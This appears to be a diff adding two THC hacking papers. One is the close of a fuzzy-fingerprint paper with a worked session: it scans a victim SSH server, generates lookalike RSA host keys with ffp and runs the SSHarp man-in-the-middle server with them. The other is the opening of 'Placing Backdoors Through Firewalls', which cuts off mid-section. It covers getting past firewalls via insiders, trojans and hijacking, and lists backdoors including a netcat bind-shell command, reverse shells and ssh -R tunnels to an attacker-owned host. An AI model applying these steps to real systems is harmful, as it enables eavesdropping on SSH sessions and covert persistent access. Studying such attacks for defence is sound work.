+implementation issues have been looked up in the OpenSSL source code 
+and some parts have even been taken from the actual implementations of 
+the RSA and DSA key generation.
+
+<div class="p"><!----></div>
+OpenSSH uses a hybrid cryptosystem: public-key cryptography is used to
+exchange a session key between the client and the server and the following
+client-server-communication is encrypted with a symmetric cipher, but
+OpenSSH, strictly implementing the SSH protocol, fully relies on the user
+verificating of an initially received public key by asking for confirmation
+if the generated cryptographic fingerprint is known and matches.
+
+<div class="p"><!----></div>
+                                         
+<pre>
+$ ssh foo@fluffy
+The authenticity of host 'fluffy (10.0.0.2)' can't be established.
+RSA key fingerprint is 54:3a:12:db:d4:35:71:45:3d:61:51:c1:df:47:bc:bc.
+Are you sure you want to continue connecting (yes/no)? 
+</pre>
+
+     
+<br clear="all" /><table border="0" width="100%"><tr><td>
+<table align="center" cellspacing="0"  cellpadding="2"><tr><td nowrap="nowrap" align="center">
+</td></tr></table>
+</td></tr></table>
+
+
+
+<div class="p"><!----></div>
+Once the fingerprint and the key have been approved the key is stored in a
+file called <tt>known_hosts</tt> or <tt>known_hosts2</tt> and upon further
+connections the retrieved public key is compared to the stored key an no
+user interaction is necessary. It has also been shown that there exists
+tricks to force the SSH client to ask again for the confirmation of a key
+eventhough a correct version has already been retrieved [<a href="#sfp" name="CITEsfp">SFP</a>]. Using
+these techniques, a man-in-the-middle tool and <tt>ffp</tt> form a quite
+mailicous attack that can be launched against any SSH connection using the
+SSH protocol version 2.
+
+<div class="p"><!----></div>
+Therefore <tt>ffp</tt> acts an extension to common man-in-the-middle tools such
+as dsniff [<a href="#ds" name="CITEds">DS</a>] or ettercap [<a href="#ec" name="CITEec">EC</a>]. If the attacker sends a public
+key to the victim that has a fuzzy fingerprint that nearly looks like the
+target fingerprint, the victim might easier be fooled to accept the public
+key and continue the eavesdropped connection. Because all those theory is 
+gray, we are quickly installing our implementation and then start to 
+actively generate a fuzzy fingerprint to be used with Sebastian Krahmer's
+tool SSHarp.
+
+<div class="p"><!----></div>
+     <h3><a name="tth_sEc3.1">
+3.1</a>&nbsp;&nbsp;Installation of <tt>ffp</tt></h3>
+
+<div class="p"><!----></div>
+In order to install this release, you need a Unix environment or at
+least something very similar such as Cygwin or QNX. You will also need
+a mathematical library which is present in most Unix system and the
+OpenSSL libraries available at <tt>http://www.openssl.org</tt>.
+
+<div class="p"><!----></div>
+If everything is place, follow the boring GNU autoconf/automake installation
+process:
+
+<div class="p"><!----></div>
+                                         
+<pre>
+$ ./configure
+$ make
+$ su -c "make install"
+</pre>
+
+     
+<br clear="all" /><table border="0" width="100%"><tr><td>
+<table align="center" cellspacing="0"  cellpadding="2"><tr><td nowrap="nowrap" align="center">
+</td></tr></table>
+</td></tr></table>
+
+
+
+<div class="p"><!----></div>
+If you want to you can use the <tt>-prefix</tt> option to install this
+software to a specific direction. The default location is <tt>/usr/local</tt>.
+If you need to you can use the <tt>-with-ssl-dir</tt> option to specify the
+directory of your OpenSSL installation.
+
+<div class="p"><!----></div>
+If during the compilation or installation process errors occur ask yourself
+at first, if you have done anything wrong, wait for a time, say 2 minutes,
+and ask yourself again if you have been honest to yourself. If it turns out
+that there is really something wrong with the code of <tt>ffp</tt> drop a mail
+to Plasmoid <tt>plasmoid@thc.org</tt> and describe your problems. Please
+understand that you are on your own if you try to fiddle with any Windows
+release and Cygwin.
+
+<div class="p"><!----></div>
+     <h3><a name="tth_sEc3.2">
+3.2</a>&nbsp;&nbsp;Usage of <tt>ffp</tt></h3>
+
+<div class="p"><!----></div>
+The current release of Fuzzy Fingerprint is a command line tool called <tt>
+ffp</tt> that has the following command line option
+
+<div class="p"><!----></div>
+                                         
+<pre>
+Usage: ffp [Options]
+Options:
+  -f type       Specify type of fingerprint to use [Default: md5]
+                Available: md5, sha1, ripemd
+  -t hash       Target fingerprint in byte blocks. 
+                Colon-separated: 01:23:45:67... or as string 01234567...
+  -k type       Specify type of key to calculate [Default: rsa]
+                Available: rsa, dsa
+  -b bits       Number of bits in the keys to calculate [Default: 1024]
+  -K mode       Specify key calulation mode [Default: sloppy]
+                Available: sloppy, accurate
+  -m type       Specify type of fuzzy map to use [Default: gauss]
+                Available: gauss, cosine
+  -v variation  Variation to use for fuzzy map generation [Default: 4.3]
+  -y mean       Mean value to use for fuzzy map generation [Default: 0.08]
+  -l size       Size of list that contains best fingerprints [Default: 10]
+  -s filename   Filename of the state file [Default: /var/tmp/ffp.state]
+  -e            Extract SSH host key pairs from state file
+  -d directory  Directory to store generated ssh keys to [Default: /tmp]
+  -p period     Period to save state file and display state [Default: 60]
+  -V            Display version information
+</pre>
+
+     
+<br clear="all" /><table border="0" width="100%"><tr><td>
+<table align="center" cellspacing="0"  cellpadding="2"><tr><td nowrap="nowrap" align="center">
+</td></tr></table>
+</td></tr></table>
+
+
+
+<div class="p"><!----></div>
+If you have read the theoretical background covered in this paper you should
+already have an idea how some of these options work and which parameters
+they influence. Due to the fact that <tt>ffp</tt> is not a kernel module, you
+run through the classical try and error phase and find the rest out
+yourself. Instead of discussing each detail of the implementation, this
+document demonstrates a sample session of <tt>ffp</tt> and SSHarp.
+
+<div class="p"><!----></div>
+     <h3><a name="tth_sEc3.3">
+3.3</a>&nbsp;&nbsp;Sample session using <tt>ffp</tt> and SSHarp</h3>
+
+<div class="p"><!----></div>
+This part of the documentation demonstrates how to use <tt>ffp</tt> in
+conjunction with a man-in-the-middle tool and describes a sample session
+that finally demonstrates the transmission and display of a fuzzy
+fingerprint. Other nasty techniques, such as ARP spoofing, that are
+necessary for the successful interception and manipulation of SSH
+connections, have been wisely left out because the author doesn't have any
+idea how these things actually work, but hopes to know some bad guys who do.
+
+<div class="p"><!----></div>
+      <h4><a name="tth_sEc3.3.1">
+3.3.1</a>&nbsp;&nbsp;Investigating the victim host</h4>
+
+<div class="p"><!----></div>
+The first step could be to investigate the victim SSH server in order to
+find out which version of SSH is used and which public key algorithms are
+available. The OpenSSH package [<a href="#ssh" name="CITEssh">SSH</a>] provides all tools we need for
+gathering information from a remote SSH server. Our victim will be the
+server <tt>skena.foo.roqe.org</tt> which luckily is not available outside the
+sample network.
+
+<div class="p"><!----></div>
+                                         
+<pre>
+foo@fluffy:doc&#62; ssh-keyscan -t rsa skena.foo.roqe.org &#62; /tmp/skena-sshd 
+# skena.foo.roqe.org SSH-1.99-OpenSSH_3.4
+foo@fluffy:doc&#62; cat /tmp/skena-sshd 
+skena.foo.roqe.org ssh-rsa
+AAAAB3NzaC1yc2EAAAABIwAAAIEAtE/CTgGl2HSUZUiCiSqhJafup [...]
+</pre>
+
+     
+<br clear="all" /><table border="0" width="100%"><tr><td>
+<table align="center" cellspacing="0"  cellpadding="2"><tr><td nowrap="nowrap" align="center">
+</td></tr></table>
+</td></tr></table>
+
+
+
+<div class="p"><!----></div>
+It turns out that <tt>skena.foo.roqe.org</tt> is using an OpenSSH v3.4 server
+able to run the SSH v2 protocol and also has an RSA public host key 
+available. This is good news for us, because <tt>ffp</tt> only support SSH v2
+keys and RSA key generation is faster than DSA <a href="#slow-dsa">2.4.2</a>. The SSH 
+server version is important to play banner tricks on the server as they 
+have been covered in Sebastian's paper. 
+
+<div class="p"><!----></div>
+Now let's take a closer look at the bits used in the RSA algorithm and 
+of course at the MD5 fingerprint of the host key we retrieved from 
+<tt>skena.foo.roqe.org</tt>.
+
+<div class="p"><!----></div>
+                                         
+<pre>
+foo@fluffy:doc&#62; ssh-keygen -f /tmp/skena-sshd -l
+1024 d6:b7:df:31:aa:55:d2:56:9b:32:71:61:24:08:44:87 skena.foo.roqe.org
+</pre>
+
+     
+<br clear="all" /><table border="0" width="100%"><tr><td>
+<table align="center" cellspacing="0"  cellpadding="2"><tr><td nowrap="nowrap" align="center">
+</td></tr></table>
+</td></tr></table>
+
+
+
+<div class="p"><!----></div>
+Again excellent news, good old <tt>skena.foo.roqe.org</tt> is only using a 1024
+bit RSA key and we also note the cryptographic fingerprint <tt>
+d6:b7:df:31:aa:55:d2:56:9b:32:71:61:24:08:44:87</tt>. So using a 2048 or even
+4096 host key is not only a good necessary protection against cryptographic
+attacks but also a protection against cheap attacks such as fuzzy
+fingerprinting.
+
+<div class="p"><!----></div>
+      <h4><a name="tth_sEc3.3.2">
+3.3.2</a>&nbsp;&nbsp;Generating a key pair with a good fuzzy fingerprint</h4>
+
+<div class="p"><!----></div>
+The next step is to generate a public key and a private key for an OpenSSH
+server so that the public key has a fuzzy fingerprint that nearly matches 
+the target fingerprint. In order to do so we launch <tt>ffp</tt> with the 
+appropriate options. <tt>ffp</tt> will output a lot of information and then 
+start to crunch. This process can take several days, the longer you wait
+the better the fuzzy fingerprint can get. Please note that the process is
+not linear at all or in any way predictable, therefore you'll need a lot of
+time or a lot of luck, best is both.
+
+<div class="p"><!----></div>
+                                         
+<pre>
+foo@fluffy:doc&#62;./ffp -f md5 -k rsa -b 1024 \ 
+                     -t d6:b7:df:31:aa:55:d2:56:9b:32:71:61:24:08:44:87
+</pre>
+
+     
+<br clear="all" /><table border="0" width="100%"><tr><td>
+<table align="center" cellspacing="0"  cellpadding="2"><tr><td nowrap="nowrap" align="center">
+</td></tr></table>
+</td></tr></table>
+
+
+
+<div class="p"><!----></div>
+Periodically <tt>ffp</tt> will send some status information to the screen and
+also show the best fuzzy fingerprint that was generated so far. Internally
+<tt>ffp</tt> keeps a list of best fuzzy fingerprints, so that you are later
+able to choose the best yourself. The output of <tt>ffp</tt> during the 
+crunching process looks like this:
+
+<div class="p"><!----></div>
+                                         
+<pre>
+---[Current State]--------------------------------------------------------
+ Running:   0d 00h 02m 00s | Total:   2216k hashs | Speed:  18469 hashs/s
+--------------------------------------------------------------------------
+ Best Fuzzy Fingerprint from State File /var/tmp/ffp.state
+    Hash Algorithm: Message Digest 5 (MD5)
+       Digest Size: 16 Bytes / 128 Bits
+    Message Digest: d1:bc:df:32:a2:45:2e:e0:96:d6:a1:7c:f5:b8:70:8f
+     Target Digest: d6:b7:df:31:aa:55:d2:56:9b:32:71:61:24:08:44:87
+     Fuzzy Quality: 47.570274%
+</pre>
+
+     
+<br clear="all" /><table border="0" width="100%"><tr><td>
+<table align="center" cellspacing="0"  cellpadding="2"><tr><td nowrap="nowrap" align="center">
+</td></tr></table>
+</td></tr></table>
+
+
+
+<div class="p"><!----></div>
+The program displays the time it is running the number of hashs it has 
+been tested in "kilohashs" and the speed. An 1.2 GHz PC has a fair 
+speed of 130000 hashs per second, where my poor UltraSparc machine only
+calculates 20000 hashs per second.
+
+<div class="p"><!----></div>
+You can interrupt a running session, by pressing the keys <tt>CTRL-C</tt>, <tt>
+ffp</tt> will abort and store the current environment in a so called state file
+that is usually stored in <tt>/var/tmp/ffp.state</tt>. Issuing again simple
+command <tt>ffp</tt> without any options continues the crunching process from
+the saved state file.
+
+<div class="p"><!----></div>
+Please note that while writing this documentation, the author did not find
+the time to search for a good fuzzy fingerprint and therefore used a
+fingerprint that was achieved after only a few minutes of intensive
+crunching on an Ultra 10. Extraction of the fingerprints is done using the
+following command.
+
+<div class="p"><!----></div>
+                                         
+<pre>
+foo@fluffy:src&#62; ./ffp -e -d /tmp    
+---[Restoring]------------------------------------------------------------
+Reading FFP State File: Done
+    Restoring environment: Done
+ Initializing Crunch Hash: Done
+--------------------------------------------------------------------------
+Saving SSH host key pairs: [00] [01] [02] [03] [04] [05] [06] [07]
+</pre>
+
+     
+<br clear="all" /><table border="0" width="100%"><tr><td>
+<table align="center" cellspacing="0"  cellpadding="2"><tr><td nowrap="nowrap" align="center">
+</td></tr></table>
+</td></tr></table>
+
+
+
+<div class="p"><!----></div>
+The generated public and private SSH host keys in the <tt>/tmp</tt> directory
+can be investigated using the following command. The attacker should use 
+the key that looks best in a human sense. Eventhough fuzzy map weighting is
+a nice measure for the quality of fuzzy fingerprints the human eye may
+best choose which fingerprint has the greatest chance to be confused with
+the original target fingerprint. 
+
+<div class="p"><!----></div>
+                                         
+<pre>
+foo@fluffy:doc&#62; for i in /tmp/ssh-rsa??.pub ; do ssh-keygen -f $i -l ; done
+1024 d6:b7:8f:a6:fa:21:0c:0d:7d:0a:fb:9d:30:90:4a:87 /tmp/ssh-rsa00.pub
+1024 d6:b5:d0:34:aa:03:ca:9b:7f:66:b4:79:0a:86:74:a7 /tmp/ssh-rsa01.pub
+1024 d6:87:6f:71:9d:2c:5d:fb:57:54:03:a2:2d:09:51:87 /tmp/ssh-rsa02.pub
+1024 d6:b2:3f:ac:13:ce:ca:59:3f:b1:4b:c2:f0:03:44:97 /tmp/ssh-rsa03.pub
+1024 d6:b9:0f:31:85:b3:34:1e:19:f5:d9:60:79:be:f4:85 /tmp/ssh-rsa04.pub
+1024 96:57:df:31:8d:11:f2:b1:28:a4:fd:6d:34:5f:b2:87 /tmp/ssh-rsa05.pub
+1024 d0:b0:df:0e:7c:f6:54:94:46:12:72:94:3a:07:a4:87 /tmp/ssh-rsa06.pub
+1024 d6:b7:dd:be:f3:52:d9:8f:7e:53:30:49:f1:a8:94:5a /tmp/ssh-rsa07.pub
+</pre>
+
+     
+<br clear="all" /><table border="0" width="100%"><tr><td>
+<table align="center" cellspacing="0"  cellpadding="2"><tr><td nowrap="nowrap" align="center">
+</td></tr></table>
+</td></tr></table>
+
+
+
+<div class="p"><!----></div>
+In this sample session the private key <tt>/tmp/ssh-rsa00</tt> and the public
+key <tt>/tmp/ssh-rsa00.pub</tt> have been chosen for the attack against the
+host <tt>skena.foo.roqe.org</tt>. But also note that only after a few minutes
+of crunching there are already several fingerprints that contain a good
+start and end sequence and two fingerprints that share the correct first two
+bytes.
+
+<div class="p"><!----></div>
+      <h4><a name="tth_sEc3.3.3">
+3.3.3</a>&nbsp;&nbsp;Launching <tt>ssharp</tt> with the generated keys</h4>
+
+<div class="p"><!----></div>
+The special thing about the SSHarp implementation is the fact that this
+tool is build upon the OpenSSH server and therefore the configuration is 
+very similar to the OpenSSH server configuration. We are now going to start
+a simple man-in-the-middle session. We launch the <tt>ssharpd</tt> server
+on the host <tt>fluffy.foo.roqe.org</tt> on port 10000. 
+
+<div class="p"><!----></div>
+                                         
+<pre>
+foo@fluffy:ssharp&#62; ./ssharpd -f /etc/ssh/sshd_config -d \
+                             -h /tmp/ssh-rsa00 -4 -p 10000
+
+Dude, Stealth speaking here. This is 7350ssharp, a smart
+SSH1 &amp; SSH2 MiM attack implementation. It's for demonstration
+and educational purposes ONLY! Think before you type ... (&lt;ENTER&#62; or
+&lt;Ctrl-C&#62;)
+
+debug1: Seeding random number generator
+debug1: sshd version OpenSSH_2.9p1
+debug1: read PEM private key done: type RSA
+debug1: private host key: #0 type 1 RSA
+Disabling protocol version 1. Could not load host key
+debug1: Bind to port 10000 on 0.0.0.0.
+Server listening on 0.0.0.0 port 10000.
+
+</pre>
+
+     
+<br clear="all" /><table border="0" width="100%"><tr><td>
+<table align="center" cellspacing="0"  cellpadding="2"><tr><td nowrap="nowrap" align="center">
+</td></tr></table>
+</td></tr></table>
+
+
+
+<div class="p"><!----></div>
+While this example looks very simple it might be necessary to study the
+details of the SSHarp implementation by reading the file <tt>README.sharp</tt>
+in order to setup a working environment. It has already been noted in the
+beginning that this session doesn't demonstrate all necessary steps to setup
+a man-in-the-middle attack and only focuses on the parts that are relevant
+to see <tt>ffp</tt> in active process.
+
+<div class="p"><!----></div>
+We can now connect to our host <tt>fluffy.foo.roqe.org</tt> at port 10000
+and see our faked public key and its fuzzy fingerprint in action using
+the normal SSH client
+
+<div class="p"><!----></div>
+                                         
+<pre>
+foo@fluffy:ssharp&#62; ssharp -l foo fluffy.foo.roqe.org -2 -p 10000
+The authenticity of host '10.0.0.2 (10.0.0.2)' can't be established.
+RSA key fingerprint is d6:b7:8f:a6:fa:21:0c:0d:7d:0a:fb:9d:30:90:4a:87.
+Are you sure you want to continue connecting (yes/no)?
+</pre>
+
+     
+<br clear="all" /><table border="0" width="100%"><tr><td>
+<table align="center" cellspacing="0"  cellpadding="2"><tr><td nowrap="nowrap" align="center">
+</td></tr></table>
+</td></tr></table>
+
+
+
+<div class="p"><!----></div>
+What we are seeing is in fact our fuzzy fingerprint and our client is 
+asking for confirmation. If the user has got a headache, trouble with
+his/ger girl/boyfriend or is not that concentrated, pressing <em>yes</em> at 
+this situation might allow an attacker to eavesdrop <em>all</em> following
+communications with the host <tt>skena.foo.roqe.org</tt>.
+
+<div class="p"><!----></div>
+In order to complete your man-in-the-middle setup, you need to redirect
+the traffic to <tt>skena.foo.roqe.org</tt> to our fake server at 
+<tt>fluffy.foo.roqe.org</tt>, e.g. by using ARP spoofing. You also need to
+use port forwarding on <tt>fluffy</tt> to redirect port 10000 to 22, so 
+that normal SSH connection will be accepted. That's it. 
+
+<div class="p"><!----></div>
+ <h2><a name="tth_sEc4">
+4</a>&nbsp;&nbsp;Thanks and greetings</h2>
+
+
+<div class="p"><!----></div>
+2
+
+<ul>
+<li> Skyper <br />
+         Who invented the idea with me and is still working on a
+         different approach to very fast RSA key generation.<br /><br /></li>
+
+<li> Wilkins and Arrow <br />
+         For the classical old-fashioned booze-ups and the 
+         obligatoric action.<br /><br /></li>
+
+<li> Hannes and Heinrich <br />
+         Who really believe this is serious, academic
+         work and code. Indeed, it is!<br /><br /></li>
+
+<li> TTEHSCO Fusion <br />
+         This is the first unofficial release for TTEHSCO. Cheers
+         to all fellows and rockers at The Hacker's Choice and 
+         Team TESO.<br /><br /></li>
+
+<li> All that jazz around <br /><br /><br /></li>
+</ul>
+
+
+
+<div class="p"><!----></div>
+
+<h2>References</h2>
+
+<dl compact="compact">
+ <dt><a href="#CITEffp" name="ffp">[FFP]</a></dt><dd>
+        <b> Implementation of Fuzzy Fingerprinting for 
+         RSA, DSA, MD5 and SHA1</b>
+
+<div class="p"><!----></div>
+        Plasmoid
+
+<div class="p"><!----></div>
+        <a href="http://www.thc.org/releases.php">http://www.thc.org/releases.php</a>
+
+<div class="p"><!----></div>
+</dd>
+ <dt><a href="#CITErsa" name="rsa">[RSA]</a></dt><dd>
+        <b>A Method for Obtaining Digital Signatures and Public-Key
+                Cryptosystems</b>
+
+<div class="p"><!----></div>
+        Ronald L. Rivest, Adi Shamir, and Leonard M. Adleman. 
+        Communications of the ACM 21,2 (Feb. 1978), 120-126.
+
+<div class="p"><!----></div>
+        <a href="http://theory.lcs.mit.edu/~rivest/rsapaper.pdf">http://theory.lcs.mit.edu/&nbsp;rivest/rsapaper.pdf</a>
+
+<div class="p"><!----></div>
+</dd>
+ <dt><a href="#CITEilp" name="ilp">[ILP]</a></dt><dd>
+        <b>How to Expose an Eavesdropper</b>
+
+<div class="p"><!----></div>
+        R. L. Rivest, Adi Shamir, Communications of the ACM, v. 27, n. 4,
+        February 1978, pp. 120-126.
+
+<div class="p"><!----></div>
+</dd>
+ <dt><a href="#CITEmd5" name="md5">[MD5]</a></dt><dd>
+        <b>The MD5 Message Digest Algorithm</b>
+
+<div class="p"><!----></div>
+        R. L. Rivest, RFC 1321. April 1992
+
+<div class="p"><!----></div>
+        <a href="http://theory.lcs.mit.edu/~rivest/Rivest-MD5.txt">http://theory.lcs.mit.edu/&nbsp;rivest/Rivest-MD5.txt</a>
+
+<div class="p"><!----></div>
+</dd>
+ <dt><a href="#CITEdss" name="dss">[DSS]</a></dt><dd>
+        <b>Digital Signature Standard (DSS)</b>
+
+<div class="p"><!----></div>
+        National Institute of Standards and Technology, NIST FIPS PUB 186,
+        U.S. Department of Commerce, May 1994.
+
+<div class="p"><!----></div>
+        <a href="http://csrc.nist.gov/publications/fips/fips186-2/fips186-2.pdf">http://csrc.nist.gov/publications/fips/fips186-2/fips186-2.pdf</a>
+
+<div class="p"><!----></div>
+</dd>
+ <dt><a href="#CITEsfp" name="sfp">[SFP]</a></dt><dd>
+        <b>SSH for Fun and Profit</b>
+
+<div class="p"><!----></div>
+        Sebastian Krahmer, July 2002
+
+<div class="p"><!----></div>
+        <a href="http://stealth.7350.org/ssharp.pdf">http://stealth.7350.org/ssharp.pdf</a>
+
+<div class="p"><!----></div>
+</dd>
+ <dt><a href="#CITEssh" name="ssh">[SSH]</a></dt><dd>
+        <b>OpenSSH Suite</b>
+
+<div class="p"><!----></div>
+        Free version of the SSH protocol suite of network connectivity
+        tools.
+
+<div class="p"><!----></div>
+        <a href="http://www.openssh.org">http://www.openssh.org</a>
+
+<div class="p"><!----></div>
+</dd>
+ <dt><a href="#CITEssl" name="ssl">[SSL]</a></dt><dd>
+        <b>OpenSSL Project</b>
+
+<div class="p"><!----></div>
+        Open Source toolkit implementing the Secure Sockets Layer (SSL
+        v2/v3) and Transport Layer Security (TLS v1) protocols.
+
+<div class="p"><!----></div>
+        <a href="http://www.openssl.org">http://www.openssl.org</a>
+
+<div class="p"><!----></div>
+</dd>
+ <dt><a href="#CITEds" name="ds">[DS]</a></dt><dd> 
+        <b>DSniff - Tools for network auditing and penetration
+        testing</b>
+
+<div class="p"><!----></div>
+        Dug Song
+
+<div class="p"><!----></div>
+        <a href="http://www.monkey.org/~dugsong/dsniff">http://www.monkey.org/&nbsp;dugsong/dsniff</a>
+
+<div class="p"><!----></div>
+</dd>
+ <dt><a href="#CITEec" name="ec">[EC]</a></dt><dd>
+        <b>Ettercap Multiprupose Sniffer/Interceptor/Logger</b>
+
+<div class="p"><!----></div>
+        A. Ornaghi, M. Valleri 
+
+<div class="p"><!----></div>
+        <a href="http://ettercap.sourceforge.net">http://ettercap.sourceforge.net</a></dd>
+</dl>
+
+<div class="p"><!----></div>
+ 
+   </td></tr>
+   </table>
+   </body>
+
+
+<div class="p"><!----></div>
+
+<br /><br /><hr /><small>File translated from
+T<sub><font size="-1">E</font></sub>X
+by <a href="http://hutchinson.belmont.ma.us/tth/">
+T<sub><font size="-1">T</font></sub>H</a>,
+version 3.44.<br />On 25 Oct 2003, 16:39.</small>
+</html>

Papers/fw-backd.htm

@@ -0,0 +1,383 @@
+<HTML>
+<HEAD>
+<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
+<TITLE>Placing Backdoors Through Firewalls
+</TITLE>
+</HEAD>
+<BODY BGCOLOR="#FFFFFF">
+<center>
+<h1>
+---[  Placing Backdoors Through Firewalls  ]---
+<br>
+v1.5
+</h1>
+<br><br>
+<table border=3 cellpadding=7 cellspacing=3>
+<tr><td>Author: <I><a href="mailto:vh@reptile.rug.ac.be">van Hauser</a> / THC</I><br>
+</td></tr>
+</table>
+</center>
+<br><br><br>
+----[  Introduction
+<p>
+This article describes possible backdoors through different firewall
+architectures. However, the material can also be applied to other
+environments to describe how hackers (you?) cover their access to a system.
+<p>
+Hackers often want to retain access to systems they have penetrated
+even in the face of obstacles such as new firewalls and patched
+vulnerabilities.  To accomplish this the attackers must install a
+backdoor which a) does it's job and b) is not easily detectable. The
+kind of backdoor needed depends on the firewall architecture used.
+<p>
+As a gimmick and proof-of-concept, a nice backdoor for any kind of
+intrusion is included, so have fun.
+<p>
+<br><br><br>
+----[  Firewall Architectures
+<p>
+There are two basic firewall architectures and each has an enhanced version.
+<p>
+Packet Filters:<ul><ul>
+This is a host or router which checks each packet against an
+allow/deny ruletable before routing it through the correct
+interface. There are very simple ones which can only filter
+from the origin host, destination host and destination port, as
+well as good ones which can also decide based on incoming interface,
+source port, day/time and some tcp or ip flags.<br>
+This could be a simple router, f.e. any Cisco, or a Linux
+machine with firewalling activated (ipfwadm).
+</ul></ul><p>
+Stateful Filters:
+<ul><ul>	This is the enhanced version of a packet filter. It
+still does the same checking against a rule table and only
+routes if permitted, but it also keeps track of the state
+information such as TCP sequence numbers.  Some pay attention
+to application protocols which allows tricks such as only
+opening ports to the interiour network for ftp-data channels
+which were specified in a permitted ftp session.  These
+filters can (more or less) get UDP packets (f.e. for DNS and
+RPC) securely through the firewall. (Thats because UDP is a
+stateless protocol. And it's more difficult for RPC services.)<br>
+This could be a great OpenBSD machine with the ip-filter software,
+a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.
+</ul></ul><p>
+Proxies / Circuit Level Gateways:
+<ul><ul>	A proxy as a firewall host is simply
+any server which has no routing activated and instead has
+proxy software installe.  <br>Examples of proxy servers which may
+be used are squid for WWW, a sendmail relay configuration
+and/or just a sockd.
+</ul></ul><p>
+Application Gateways:
+<ul><ul>        This is the enhanced version of a proxy. Like a proxy, for every
+application which should get through the firewall a software must
+be installed and running to proxy it. However, the application
+gateway is smart and checks every request and answer, f.e. that
+an outgoing ftp only may download data but not upload any, and that
+the data has got no virus, no buffer overflows are generated in
+answers etc. One can argue that squid is an application
+gateway, because it does many sanity checks and let you filter
+stuff but it was not programmed for the installation in a secure
+environment and still has/had security bugs.<br>
+A good example for a freeware kit for this kind is the TIS firewall
+toolkit (fwtk).
+</ul></ul><p>
+Most firewalls that vendors sell on the market are hybrid firwalls,
+which means they've got more than just one type implemented; for
+example the IBM Firewall is a simple packet filter with socks and a
+few proxies.  I won't discuss which firewall product is the best,
+because this is not a how-to-by-a-firewall paper, but I will say this:
+application gateways are by far the most secure firewalls,
+although money, speed, special protocols, open network policies,
+stupidity, marketing hype and bad management might rule them out.
+
+
+
+<br><br><br>
+----[  Getting in
+<p>
+Before we talk about what backdoors are the best for which firewall
+architecture we should shed a light on how to get through a firewall
+the first time. Note that getting through a firewall is not a plug-n-play
+thing for script-kiddies, this has to be carefully planned and done.
+<p>
+The four main possibilities:
+<p>
+Insider: 
+<ul><ul>        There's someone inside the company (you, girl/boy-friend, chummer)
+        who installs the backdoor. This is the easiest way of course.
+</ul></ul><p>
+Vulnerable Services: 
+<ul><ul>        Nearly all networks offer some kind of services,
+        such as incoming email, WWW, or DNS. These may be on the
+        firewall host itself, a host in the DMZ (here: the zone in front
+	of the firewall, often not protected by a firewall) or on an internal
+        machine. If an attacker can find a hole in one of those services,
+        he's got good chances to get in.  You'd laugh if you'd see how many
+        "firewalls" run sendmail for mail relaying ...
+</ul></ul><p>
+Vulnerable External Server: 
+<ul><ul>        People behind a firewall sometimes work on
+        external machines.  If an attacker can hack these, he can
+        cause serious mischief such as the many X attacks if the
+        victim uses it via an X-relay or sshd.  The attacker could
+        also send fake ftp answers
+        to overflow a buffer in the ftp client software, replace a gif
+        picture on a web server with one which crashs netscape and
+        executes a command (I never checked if this actually works, it
+        crashs, yeah, but I didn't look through this if this is really
+        an exploitable overflow).  There are many possibilities with
+        this but it needs some knowledge about the company. However,
+        an external web server of the company is usually a good start.
+        Some firewalls are configured to allow incoming telnet from
+        some machines, so anyone can sniff these and get it. This is
+        particulary true for the US, where academic environments and
+        industry/military work close together.
+</ul></ul><p>
+Hijacking Connections:
+<ul><ul>        Many companies think that if they allow incoming telnet with
+        some kind of secure authentication like SecureID (secure algo?, he)
+        they are safe. Anyone can hijack these after the authentication and
+        get in ... Another way of using hijacked connections is to modify
+        replies in the protocol implementation to generate a buffer
+        overflow (f.e. with X).
+</ul></ul><p>
+Trojans:
+<ul><ul>        Many things can be done with a trojan horse.
+        This could be a gzip file which generates a buffer overflow
+        (well, needs an old gzip to be installed), a tar file which
+        tampers f.e. ~/.logout to execute something, or an executable
+        or source code which was modified to get the hacker in somehow.
+        To get someone running this, mail spoofing could be used or
+        replacing originals on an external server which internal employees
+        access to update their software regulary (ftp xfer files and www
+        logs can be checked to get to know which files these are).
+</ul></ul><p>
+
+
+<br><br><br>
+----[  Placing the Backdoors
+<p>
+An intelligent hacker will not try to put the backdoors on machines in
+the firewall segment, because these machines are usually monitored and
+checked regulary. It's the internal machines which are usually unprotected
+and without much administration and security checks.
+<p>
+I will now talk about some ideas of backdoors which could be implemented.
+Note that programs which will/would run on an stateful filter will of course
+work with a normal packet filter too, same for the proxy. Ideas for an
+application gateway backdoor will work for any architecture.<br>
+Some of them are "active" and others "passive". "Active" backdoors are those
+which can be used by a hacker anytime he wishes, a "passive" one triggers
+itself by time/event so an attacker has to wait for this to happen.
+<p>
+Packet Filters:
+<ul><ul>        It's hard to find a backdoor which gets through this one but does
+        not work for any other. The few ones which comes into my mind<br>
+        is a) the ack-telnet. It works like a normal telnet/telnetd except
+        it does not work with the normal tcp handshake/protocol but uses
+        TCP ACK packets only. Because they look like they belong to an
+        already established (and allowed) connection, they are permitted.
+        This can be easily coded with the spoofit.h of Coder's Spoofit
+        project (<A HREF="http://reptile.rug.ac.be/~coder">http://reptile.rug.ac.be/~coder</A>).<br>
+        b) Loki from Phrack 49/51 could be used too to establish a tunnel
+        with icmp echo/reply packets. But some coding would be needed to
+        to be done.<br>
+        c) daemonshell-udp is a backdoor shell via UDP<br>
+           (<A HREF="http://www.thc.org">http://www.thc.org</A>  look for thc-uht1.tgz)<br>
+        d) Last but not least, most "firewall systems" with only a screening
+        router/firewall let any incoming tcp connection from the source port
+        20 to a highport (>1023) through to allow the (non-passive) ftp
+        protocol to work. "netcat -p 20 target port-of-bindshell" is the
+        fastest solution for this one.
+</ul></ul><p>
+Stateful Filters:
+<ul><ul>        Here a hacker must use programs which initiates the connection from
+        the secure network to his external 0wned server.
+        There are many out there which could be used:<br>
+        active:<ul>
+		 tunnel from Phrack 52.<br>
+                 ssh with the -R option (much better than tunnel ... it's
+                 a legtimitate program on a computer and it encrypts the
+                 datastream).
+</ul>
+        passive:<ul>
+		 netcat compiled with the execute option and run with a
+                 time option to connect to the hacker machine (<A HREF="ftp://ftp.avian.org">ftp.avian.org</A>).<br>
+                 reverse_shell from the thc-uht1.tgz package (see above) does the same.
+</ul></ul><p>
+Proxies / Circuit Level Gateways:
+<ul><ul>        If socks is used on the firewall, someone can use all those stuff
+        for the stateful filter and "socksify" them. (<A HREF="www.socks.net.com">www.socks.nec.com</A>)
+        For more advanced tools you'd should take a look at the application
+        gateway section.
+</ul></ul><p>
+Application Gateways:
+<ul><ul>        Now we get down to the interesting stuff. These beasts can be
+        intelligent so some brain is needed.<br>
+        active:<ul>
